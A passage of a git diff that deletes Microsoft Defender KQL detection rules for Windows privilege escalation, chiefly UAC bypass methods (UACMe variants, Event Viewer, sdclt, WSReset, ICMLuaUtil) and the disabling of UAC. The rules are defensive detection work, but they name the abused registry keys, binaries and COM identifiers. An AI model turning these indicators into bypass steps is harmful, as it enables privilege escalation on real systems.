"\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql b/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql deleted file mode 100644 index ba29c60d..00000000 --- a/Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/31 -// Level: high -// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files"))) \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql b/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql deleted file mode 100644 index f8815880..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql b/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql deleted file mode 100644 index c912f517..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\slui.exe" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql deleted file mode 100644 index c45c8dd3..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql deleted file mode 100644 index b14f6498..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\consent.exe" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql b/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql deleted file mode 100644 index 949e3b2b..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_DismHost.kql b/Privilege Escalation/UAC_Bypass_Using_DismHost.kql deleted file mode 100644 index 63f130be..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_DismHost.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe") \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql b/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql deleted file mode 100644 index 3043fd99..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_EventVwr.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems) -// Date: 2022/04/27 -// Level: high -// Description: Detects the pattern of a UAC bypass using Windows Event Viewer -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceFileEvents -| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql b/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql deleted file mode 100644 index 974b22fe..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/11/22 -// Level: high -// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceProcessEvents -| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql deleted file mode 100644 index 26df3a86..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql deleted file mode 100644 index 25b12cc5..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql deleted file mode 100644 index 1ca85fad..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql deleted file mode 100644 index eaf21560..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql b/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql deleted file mode 100644 index 7d63fa2a..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/17 -// Level: high -// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH% -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceImageLoadEvents -| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll"))) \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql deleted file mode 100644 index cadc4f08..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql deleted file mode 100644 index ebc4f60d..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql deleted file mode 100644 index 79b84858..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql deleted file mode 100644 index a2dfe81e..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/30 -// Level: high -// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck") \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql b/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql deleted file mode 100644 index 594500b1..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql deleted file mode 100644 index ef7a7239..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceFileEvents -| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe") \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql deleted file mode 100644 index 96f8c1bd..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s") \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql deleted file mode 100644 index dc52850a..00000000 --- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql b/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql deleted file mode 100644 index 7ddbf642..00000000 --- a/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Dmitry Uchakin -// Date: 2020/10/07 -// Level: high -// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceRegistryEvents -| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_WSReset.kql b/Privilege Escalation/UAC_Bypass_WSReset.kql deleted file mode 100644 index b39549cb..00000000 --- a/Privilege Escalation/UAC_Bypass_WSReset.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System")) \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql b/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql deleted file mode 100644 index ea6ebd96..00000000 --- a/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: oscd.community, Dmitry Uchakin -// Date: 2020/10/06 -// Level: high -// Description: Attempts to load dismcore.dll after dropping it -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll")) \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql b/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql deleted file mode 100644 index c13ab477..00000000 --- a/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2017/03/19 -// Level: high -// Description: Detects UAC bypass method using Windows event viewer -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001 -DeviceRegistryEvents -| where RegistryKey endswith "\\mscfile\\shell\\open\\command" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql b/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql deleted file mode 100644 index e6a2379f..00000000 --- a/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Elastic (idea) -// Date: 2022/09/13 -// Level: high -// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002 -DeviceProcessEvents -| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe"))) \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_via_Sdclt.kql b/Privilege Escalation/UAC_Bypass_via_Sdclt.kql deleted file mode 100644 index 62170641..00000000 --- a/Privilege Escalation/UAC_Bypass_via_Sdclt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Omer Yampel, Christian Burkard (Nextron Systems) -// Date: 2017/03/17 -// Level: high -// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001 -DeviceRegistryEvents -| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue") \ No newline at end of file diff --git a/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql b/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql deleted file mode 100644 index dce3946b..00000000 --- a/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/27 -// Level: medium -// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in -// Tags: attack.privilege_escalation, attack.t1548 -DeviceProcessEvents -| where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe")) \ No newline at end of file diff --git a/Privilege Escalation/UAC_Disabled.kql b/Privilege Escalation/UAC_Disabled.kql deleted file mode 100644 index 0ee19c33..00000000 --- a/Privilege Escalation/UAC_Disabled.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: frack113 -// Date: 2022/01/05 -// Level: medium -// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. - -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Notification_Disabled.kql b/Privilege Escalation/UAC_Notification_Disabled.kql deleted file mode 100644 index 0c9d6980..00000000 --- a/Privilege Escalation/UAC_Notification_Disabled.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/05/10 -// Level: medium -// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. -UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. -When "UACDisableNotify" is set to 1, UAC prompts are suppressed. - -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify" \ No newline at end of file diff --git a/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql b/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql deleted file mode 100644 index 684fe543..00000000 --- a/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2024/05/10 -// Level: medium -// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. -The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. -When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. - -// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop" \ No newline at end of file diff --git a/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql b/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql deleted file mode 100644 index 6f462ae1..00000000 --- a/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/01 -// Level: medium -// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. -Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011 -DeviceProcessEvents -| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or isnull(ProcessCommandLine) or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg")))) \ No newline at end of file diff --git a/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql deleted file mode 100644 index 63e818d3..00000000 --- a/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2022/07/15 -// Level: high -// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00") \ No newline at end of file diff --git a/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql b/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql deleted file mode 100644 index 6d500082..00000000 --- a/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/24 -// Level: medium -// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013 -DeviceFileEvents -| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1" \ No newline at end of file diff --git a/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql deleted file mode 100644 index 3f40bc3a..00000000 --- a/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/09/02 -// Level: medium -// Description: Detects signs of 